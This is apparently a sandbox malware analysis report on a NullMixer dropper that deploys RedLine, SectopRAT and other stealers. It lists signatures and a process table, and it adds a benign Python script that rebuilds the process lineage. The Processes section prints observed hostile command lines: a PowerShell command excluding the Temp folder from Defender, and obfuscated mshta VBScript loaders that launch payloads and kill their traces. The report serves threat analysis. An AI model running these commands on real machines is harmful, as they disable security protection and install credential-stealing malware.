Malware Analysis Report

2025-01-02 06:01

Sample ID 241124-1fjzsawqgj
Target 46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe
SHA256 46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline sectoprat socelars ani she aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308

Threat Level: Known bad

The file 46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe was found to be: Known bad.

Malicious Activity Summary

fabookie gcleaner nullmixer onlylogger privateloader redline sectoprat socelars ani she aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan

PrivateLoader

SectopRAT

RedLine

Fabookie family

Socelars payload

RedLine payload

Fabookie

Socelars

NullMixer

Sectoprat family

Socelars family

Privateloader family

SectopRAT payload

Onlylogger family

Nullmixer family

Gcleaner family

GCleaner

Redline family

Detect Fabookie payload

OnlyLogger

OnlyLogger payload

Command and Scripting Interpreter: PowerShell

ASPack v2.12-2.42

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Looks up external IP address via web service

Drops Chrome extension

Looks up geolocation information via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Browser Information Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 21:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 21:35

Reported

2024-11-24 21:37

Platform

win7-20240903-en

Max time kernel

5s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 2796 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe C:\Windows\SysWOW64\cmd.exe
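
The table above logs one row per WriteProcessMemory call, so every spawn appears several times and the actual chain (sample.exe to setup_installer.exe to setup_install.exe to cmd.exe to powershell.exe, plus the fan-out of cmd.exe children under PID 3008) is hard to read off. The script below is an added example, not part of the sandbox report: it parses rows in exactly the report's shape (a subset copied from the table, with the first edge kept three times instead of seven), collapses duplicates into one edge with a write count, and prints the lineage. Function names and the tree layout are this example's own.

```python
"""Rebuild process lineage from 'Suspicious use of WriteProcessMemory' rows.
Added example, not part of the report; the row text is a subset copied from
the table above, everything else is constructed here."""
import re
from collections import defaultdict

T = r"C:\Users\Admin\AppData\Local\Temp"
S = r"C:\Windows\SysWOW64"
SAMPLE = T + r"\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"
INSTALLER = T + r"\setup_installer.exe"
INSTALL = T + r"\7zSCEA9C056\setup_install.exe"
CMD = S + r"\cmd.exe"
PS = S + r"\WindowsPowerShell\v1.0\powershell.exe"

# Constructed input in the report's own row shape.  The sandbox logs one row
# per WriteProcessMemory call, so a single spawn shows up several times; the
# report repeats the first edge seven times, this subset keeps three.
ROWS = "\n".join(
    [f"PID 2684 wrote to memory of 2796 N/A {SAMPLE} {INSTALLER}"] * 3
    + [
        f"PID 2796 wrote to memory of 3008 N/A {INSTALLER} {INSTALL}",
        f"PID 3008 wrote to memory of 2152 N/A {INSTALL} {CMD}",
        f"PID 2152 wrote to memory of 2104 N/A {CMD} {PS}",
        f"PID 3008 wrote to memory of 2212 N/A {INSTALL} {CMD}",
        f"PID 3008 wrote to memory of 836 N/A {INSTALL} {CMD}",
        f"PID 3008 wrote to memory of 1608 N/A {INSTALL} {CMD}",
        f"PID 3008 wrote to memory of 1852 N/A {INSTALL} {CMD}",
    ]
)

ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def parse_rows(text):
    """One (parent_pid, child_pid, parent_image, child_image) tuple per row."""
    edges = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            edges.append((int(m[1]), int(m[2]), m[3], m[4]))
    return edges


def build_tree(edges):
    """Collapse repeated rows into unique parent->child edges plus a write count."""
    children, image, writes = defaultdict(list), {}, defaultdict(int)
    for p, c, pimg, cimg in edges:
        image.setdefault(p, pimg)
        image.setdefault(c, cimg)
        if c not in children[p]:
            children[p].append(c)
        writes[(p, c)] += 1
    return children, image, writes


def roots(children):
    """PIDs that write to others but were never written to: the initial sample."""
    spawned = {c for cs in children.values() for c in cs}
    return sorted(p for p in children if p not in spawned)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def render(children, image, writes, pid, depth=0, parent=None):
    """Indented tree, one process per line, repeated writes shown as a count."""
    note = f" ({writes[(parent, pid)]} writes)" if parent is not None else ""
    lines = [f"{'  ' * depth}{pid} {basename(image[pid])}{note}"]
    for c in children.get(pid, []):
        lines += render(children, image, writes, c, depth + 1, pid)
    return lines


def chain(children, image, target):
    """Image names from the root down to `target` (how powershell.exe was reached)."""
    parent = {c: p for p, cs in children.items() for c in cs}
    path = [target]
    while path[-1] in parent:
        path.append(parent[path[-1]])
    return [basename(image[p]) for p in reversed(path)]


if __name__ == "__main__":
    edges = parse_rows(ROWS)
    children, image, writes = build_tree(edges)
    for root in roots(children):
        print("\n".join(render(children, image, writes, root)))
    print(" -> ".join(chain(children, image, 2104)))
```

The same parser works on the full table: paste all rows into ROWS and the first edge reports 7 writes, while PID 3008 gains the remaining cmd.exe children (2864, 2888) that this subset omits.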

Processes

C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe

"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ee0a6fe195bd09.exe

Fri20ee0a6fe195bd09.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2050293ea5.exe

Fri2050293ea5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209d5bfbb2.exe

Fri209d5bfbb2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20109b9e174d0fc.exe

Fri20109b9e174d0fc.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20e095683c2b3a0c.exe

Fri20e095683c2b3a0c.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2002ce5f91c761.exe

Fri2002ce5f91c761.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe

Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe

Fri20ba391d4469.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209f6924af86d795.exe

Fri209f6924af86d795.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe

Fri20d5530575e8aa3ed.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20c0c46650eeb2a.exe

Fri20c0c46650eeb2a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe

Fri208f5f140853548.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri200ae385720d3.exe

Fri200ae385720d3.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2060ea1c5d8fae8aa.exe

Fri2060ea1c5d8fae8aa.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 272

C:\Users\Admin\AppData\Local\Temp\is-71TVF.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-71TVF.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$301C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$401C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "" == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe" ) do taskkill /F -Im "%~NxU"

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\taskkill.exe

